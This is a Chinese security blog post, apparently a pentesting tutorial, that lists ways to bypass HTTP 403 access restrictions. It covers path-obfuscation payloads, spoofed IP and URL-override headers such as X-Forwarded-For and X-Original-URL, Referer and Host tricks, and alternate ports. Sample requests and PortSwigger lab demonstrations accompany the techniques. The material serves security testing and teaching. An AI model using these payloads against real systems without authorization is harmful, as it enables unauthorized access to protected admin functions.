403 forbidden绕过

最新推荐文章于 2024-04-25 10:04:42 发布
最新推荐文章于 2024-04-25 10:04:42 发布
阅读量656 收藏 2
点赞数
文章标签: web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/st3pby/article/details/128485994
版权

403bypass burp插件:

https://github.com/sting8k/BurpSuite_403Bypasser

403 forbidden 绕过技巧

扩展名/uri 混淆

site.com/admin => 403

site.com/admin/ => 200
site.com/random-dir/../admin => 200
site.com/random-dir/..;/admin => 200
site.com/random-dir/..%252F/admin => 200
site.com/admin// => 200
site.com//admin// => 200
site.com/admin/* => 200
site.com/admin/*/ => 200
site.com/admin/. => 200
site.com/admin/./ => 200

site.com/./admin/./ => 200
site.com/admin/./. => 200
site.com/admin/./. => 200
site.com/admin? => 200
site.com/admin?? => 200
site.com/admin??? => 200
site.com/admin..;/ => 200
site.com/admin/..;/ => 200
site.com/%2f/admin => 200
site.com/%2e/admin => 200
site.com/admin%20/ => 200
site.com/admin%09/ => 200
site.com/%20admin%20/ => 200
site.com/%0dadmin => 200

代理IP

一般开发者会通过 Nginx 代理识别访问端 IP 限制对接口的访问,尝试使用 X-Forwarded-For、X-Forwared-Host 等标头绕过 Web 服务器的限制。

- X-Originating-IP: 127.0.0.1
- X-Remote-IP: 127.0.0.1
- X-Client-IP: 127.0.0.1
- X-Forwarded-For: 127.0.0.1
- X-Forwared-Host: 127.0.0.1
- X-Host: 127.0.0.1
- X-Custom-IP-Authorization: 127.0.0.1

示例:

Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 401 Unauthorized


Reqeust
GET /auth/login HTTP/1.1
X-Custom-IP-Authorization: 127.0.0.1
Response
HTTP/1.1 200 OK

Referer 标头绕过

尝试使用 Referer 标头绕过 Web 服务器的限制。

介绍:Referer 请求头包含了当前请求页面的来源页面的地址,即表示当前页面是通过此来源页面里的链接进入的。服务端一般使用 Referer 请求头识别访问来源。

示例:

Request
GET /auth/login HTTP/1.1
Host: xxx
Response
HTTP/1.1 403 Forbidden

Reqeust
GET / HTTP/1.1
Host: xxx
ReFerer:https://xxx/auth/login
Response
HTTP/1.1 200 OK

or

Reqeust
GET /auth/login HTTP/1.1
Host: xxx
ReFerer:https://xxx/auth/login
Response
HTTP/1.1 200 OK

Burp 学院实验室进行演示,使用非管理员凭据登录后,浏览 /admin-roles?username=carlos&action=upgrade 服务端返回 401 未进行认证,无权限访问。

image-20220308172812772

在 Header 头中添加 Referer 标头,服务端提示 302 表示请求成功,使用 Referer 标头绕过 Web 服务器的限制。

image-20220308172833255

覆盖请求 URL

尝试使用 X-Original-URL 和 X-Rewrite-URL 标头绕过 Web 服务器的限制。

介绍:通过支持 X-Original-URL 和 X-Rewrite-URL 标头,用户可以使用 X-Original-URL 或 X-Rewrite-URL HTTP 请求标头覆盖请求 URL 中的路径,尝试绕过对更高级别的缓存和 Web 服务器的限制。

示例:

Request
  GET /auth/login HTTP/1.1
  Response
  HTTP/1.1 403 Forbidden

Reqeust
  GET / HTTP/1.1
  X-Original-URL: /auth/login
  Response
  HTTP/1.1 200 OK

or

Reqeust
  GET / HTTP/1.1
  X-Rewrite-URL: /auth/login
  Response
  HTTP/1.1 200 OK

Burp 学院实验室进行演示,首先普通用户访问 admin 页面会被限制,要使用 admin 用户登录才行。点击 管理面板(Admin panel)burp 抓包查看,服务端返回 403,”Access denied” 禁止访问。

image-20220308172658373

在 Header 头中添加 X-Original-URL 标头,发现已经有权限可以删除 Administrator、carlos、wiener 帐号的管理员权限。

image-20220308173147076

修改 HOST

我们先说下 Host 在请求头中的作用,在一般情况下,几个网站可能会部署在同一个服务器上,或者几个 web 系统共享一个服务器,通过 host 头来指定应该由哪个网站或者 web 系统来处理用户的请求。

而很多 WEB 应用通过获取 HTTP HOST 头来获得当前请求访问的位置,但是很多开发人员并未意识到 HTTP HOST 头由用户控制,从安全角度来讲,任何用户输入都是认为不安全的。

当服务器获取 HOST 的方式不当时,我们可以通过修改 Host 值来进行绕过。首先对该目标域名进行子域名收集,整理好子域名资产(host 字段同样支持 IP 地址)。先 Fuzz 测试跑一遍收集到的子域名,这里使用的是 Burp 的 Intruder 功能。

image-20220308173734440

往往成功也离不开运气,看到一个服务端返回 200 的状态码。成功找到一个在 HOST 白名单中的子域名。我们利用 firefox 插件来修改 HOST 值,成功绕过访问限制。

image-20220308173757919

端口利用

iamadmixxx.xxx.xxx:80/auth/login 403 forbidden

端口信息收集,利用 nmap 进行全端口探测,发现除了 80 端口之外,还开放了一个 web 服务的 8001 端口,我们尝试使用 8001 端口访问 (xxx.xxxx.com:8001) ,总是充满惊喜。可直接绕过 IP 限制进行访问。

iamadmixxx.xxx.xxx:8001/auth/login

image-20220308174056987

st3pby
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BurpSuite_403Bypasser:Burpsuite扩展程序绕过403受限制的目录
03-11
403章 一个burpsuite扩展名,用于绕过403受限制的目录。 通过使用PassiveScan(默认启用),此扩展名将自动扫描每个403请求,因此只需添加到burpsuite中即可。 有效负载:$ 1:HOSTNAME $ 2:PATH $1/$2 $1/./$2 $1/$2/. $1//$2// $1/./$2/./ $1/$2anything -H "X-Original-URL: /$2" $1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1" $1 -H "X-Rewrite-URL: /$2" $1/$2 -H "Referer: /$2" $1/$2 -H "X-Originating-IP: 127.0.0.1" $1/$2 -H "X-Forwarded-For: 127.0.0.1" $1/$2 -H "X-Re
403bypasser:自动执行403响应代码绕过的过程
05-25
403路人 自动执行403响应代码绕过的过程 描述 我注意到许多#bugbountytips描述了如何绕过403响应代码,因此当我收集所有方法时,我发现我需要40多个请求来处理所有方法。 因此,由于我喜欢自动化,因此我创建了此工具来完成繁重的工作。 但我也建议您稍后需要手动检查 该工具使用三种技术尝试绕过403响应代码,并在彩色输出中给出每次重试的响应代码,以便于阅读: 1-使用多种请求方法(GET-POST- HEAD等) 2-在URL的末尾使用多个有效负载(鸣叫这些提示的人表示敬意) 3-将标头添加到请求(X-Forwarded-Host,X-Host ...等) 安装 : 1- git clone 2 CD 403旁路 3- pip3 install -r requirements.txt 用法 该工具带有两个参数:url-路径 python3 403bypasser.p
403bypass插件-BurpSuite_403Bypasser(一)
siu~
08-23 1646
一个burpsuite扩展绕过403限制目录。通过使用PassiveScan(默认启用),每个403请求将被这个扩展自动扫描,所以只需添加到burpsuite并享受。
【渗透实战】使用403bypasser绕过目标页面上的访问控制限制
kjuhfkicf154的博客
02-01 2514
403bypasser是一款自动化工具,该工具能够以自动化的形式实现针对目标页面的访问控制限制绕过技术。
使用403Bypasser绕过HTTP 403错误:技术解析与应用指南
gitblog_00037的博客
04-25 519
使用403Bypasser绕过HTTP 403错误:技术解析与应用指南 项目地址:https://gitcode.com/yunemse48/403bypasser 当你试图访问某个网页时,如果收到“HTTP 403 Forbidden”错误,这意味着服务器已经识别到你的请求,但拒绝提供服务。这可能是由于各种安全策略或版权保护措施引起的。然而,对于开发者和研究人员来说,这种限制可能阻碍了他们的工...
403ByPass总结
LainWith的博客
08-17 9939
直接访问网站如下图,这里使用vulnhub靶机“Y0USEF: 1”为例,介绍几种403ByPass的手段。应该使用方法3探知网站,避免全程绕过导致渗透报告上少了漏洞一旦确认403 ByPass如果后期需要BP,直接采用方法3,或者直接方法2(关闭方法3的插件)如果后期不需要BP,直接方法1。...
403 Forbidden错误原因
沐雨金鳞
09-08 492
1、你的IP被列入黑名单。 2、你在一定时间内过多地访问此网站(一般是用采集程序),被防火墙拒绝访问了。 3、网站域名解析到了空间,但空间未绑定此域名。 4、你的网页脚本文件在当前目录下没有执行权限。 5、在不允许写/创建文件的目录中执行了创建/写文件操作。 6、以http方式访问需要ssl连接的网址。 7、浏览器不支持SSL 128时访问SSL 128的连接。 8、在身份验证的过程中输入了错误的密码。 9、DNS解析错误,手动更改DNS服务器地址。 10、连接的用户过多,可以过后再试。
一款针对于403响应的bypass工具-403bypasser
siu~
07-04 1092
403bypasser自动化了用于绕过目标页面上的访问控制限制的技术。
简单的bash脚本使用#bugbountytips中讨论的众所周知的方法绕过403 Forbidden”消息-Linux开发
05-27
简单的bash脚本使用#bugbountytips byp4xx.sh中讨论的众所周知的方法绕过403 Forbidden”消息。简单的bash脚本使用#bugbountytips安装中讨论的众所周知的方法绕过403 Forbidden”消息:git clone ...
Golang_GoHTTP 403绕过工具.zip
最新发布
05-26
针对403错误,开发者有时需要采取特殊手段进行“绕过”,但这并不意味着可以无视网站的安全策略,而是通过合法的手段解决访问限制问题。本篇文章将深入探讨Golang中如何利用GoHTTP库来处理403错误,并介绍403jump_...
byp4xx:简单的bash脚本使用#bugbountytips中讨论的众所周知的方法绕过403 Forbidden”消息
03-11
byp4xx.sh __ __ __ / /_ __ ______ / // / _ ___ __ / __ \/... /_.___/\__, / .___/ /_/ /_/|_/_/|_| /____/_/ 一个bash脚本,使用#bugbountytips中讨论的众所周知的方法绕过403 Forbidden”响应安装: git clone ...
bypass-403:一个简单的脚本,仅供旁路403使用
04-13
旁通403 一个简单的脚本,仅供旁路403使用 它也可以用来比较各种条件下的响应,如下图所示 用法 ./bypass-403.sh https://example.com admin ./bypass-403.sh website-here path-here 特征 在卷曲的帮助下使用13个已知的403绕过 安装 git clone https://github.com/iamj0ker/bypass-403 cd bypass-403 chmod +x bypass-403.sh sudo apt install figlet如果您无法看到屏幕截图中的徽标 贡献者
BypassSuper:绕过403或401或404
05-23
BypassSuper 一款针对403/401页面进行快速、高效尝试Bypass的扫描工具 ______ _____ | ___ \ / ___| | |_/ /_ _ _ __ __ _ ___ ___ \ `--. _ _ _ __ ___ _ __ | ___ \ | | | '_ \ / _` / __/ __| `--. \ | | | '_ \ / _ \ '__| | |_/ / |_| | |_) | (_| \__ \__ \/\__/ / |_| | |_) | __/ |
目录扫描+JS文件中提取URL和子域+403状态绕过+指纹识别
02-06
在`dirsearch_bypass403_main.zip`中可能包含了一种特定的绕过403的方法或工具,帮助安全研究员突破这种限制,揭示可能被隐藏的内容。 4. **指纹识别**: 指纹识别(也称为Web指纹)是指通过收集和分析网站的响应...
第六节 文件上传-绕过黑名单验证(空格绕过)-01
09-15
文件上传-绕过黑名单验证(空格绕过) 文件上传绕过黑名单验证是指攻击者通过巧妙地构造文件名,绕过服务器端的黑名单验证,从而上传恶意文件。其中,空格绕过原理是其中一种常见的绕过方式。 一、空格绕过原理 ...
探秘BurpSuite_403Bypasser:解决HTTP 403错误的强大工具
gitblog_00068的博客
03-25 644
探秘BurpSuite_403Bypasser:解决HTTP 403错误的强大工具 项目地址:https://gitcode.com/sting8k/BurpSuite_403Bypasser 在网络安全Web应用测试领域, BurpSuite是不可或缺的一款神器。而 BurpSuite_403Bypasser是一个针对BurpSuite的扩展插件,专门用于绕过HTTP 403 Forbidde...
403bypass插件-BypassPro(二)
siu~
08-23 642
对权限绕过自动化bypass的burpsuite插件
Burpsuite扩展绕过403受限目录
2301_79205724的博客
08-31 224
一个burpsuite扩展,用于绕过403受限制的目录。通过使用PassiveScan(默认启用),此扩展将扫描每个403请求,因此只需添加到burpsuite中即可。
深入了解`bypass-403`: 解析、应用与特性
gitblog_00049的博客
03-26 451
深入了解bypass-403: 解析、应用与特性 项目地址:https://gitcode.com/iamj0ker/bypass-403 项目简介 在互联网探索中,我们有时会遇到403 Forbidden错误,这意味着服务器理解了我们的请求,但拒绝执行。bypass-403是一个开源项目,旨在帮助开发者和研究人员绕过这些权限限制,以便于合法的网络数据抓取或分析。该项目由Python编写,提供了一...
How To Bypass 403 Error
cnbird's blog
11-20 603
 OK, this tutorial is for ppl like me who use an alternative way of searching for things on internet, EXMPL: instead of typing: www.ubuntu.com/iso, I would go this way: " index of /ISO/Ubuntu " So thi

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值